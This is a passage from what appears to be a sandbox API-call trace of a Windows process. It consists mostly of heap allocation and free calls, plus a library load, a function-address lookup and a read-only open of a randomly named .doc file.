Size=0x10) returned 0x43cafd0 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.305] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0131.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0131.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.308] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0131.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0131.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0131.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cae50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0131.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.308] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0131.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\d-agzysfkdtup0q.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0131.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0131.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0131.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.312] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.314] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.314] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.315] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0131.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925a8 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: 